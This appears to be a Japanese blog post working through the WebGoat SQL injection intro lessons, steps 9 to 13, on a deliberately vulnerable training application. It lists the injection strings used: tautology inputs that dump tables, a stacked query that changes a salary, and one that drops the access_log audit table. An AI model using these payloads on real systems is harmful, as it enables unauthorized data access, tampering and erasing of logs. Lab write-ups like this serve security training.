shikata ga nai

Private? There is no such things.

WEBGOATでA1-SQL Injection(intor)2

Hello there,

 

A1 ⇨ SQL Injection(intor)を選択して。

説明のあるステップを後回しにすることにして。

 

ステップ9を見ると。

usersテーブルからすべてのユーザーを取得してくださいとのことで。

下記を選択して実行してみると。

 '

 or

 '1'='1

 

f:id:ThisIsOne:20191226153442p:plain

 

ステップ10を見ると。

usersテーブルからすべてのデータを取得して下さいとのことで。

下記を実行してみると。

 1(適当な数値)

 1 or 1=1

 

f:id:ThisIsOne:20191226153652p:plain

 

ステップ11を見ると。

employeesテーブルからすべての従業員データを取得してくださいとのことで。

情報を取得するのに名前やTANを知る必要はないらしく。

下記を実行してみると。

 Neo(適当に)

 123' OR '1' = '1

 

f:id:ThisIsOne:20191226154200p:plain

 

ステップ12を見ると。

あなた最も稼いでいるように自分の給料を変えましょうとのことで。

ちなみにあなたの名前はSmithで、TANは3SL99A。

下記を実行してみると。

 Neo(適当に)

 123'; UPDATE employees SET salary = 100000 WHERE auth_tan = '3SL99A

 

f:id:ThisIsOne:20191226154744p:plain

 

ステップ13を見ると。

すべてのアクションが記録されているaccess_logテーブルがあるようで。

それを完全に削除してくださいとのことらしく。

下記を実行してみると。

 Neo'; DROP table access_log; --

 

f:id:ThisIsOne:20191226155709p:plain

 

Best regards,

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain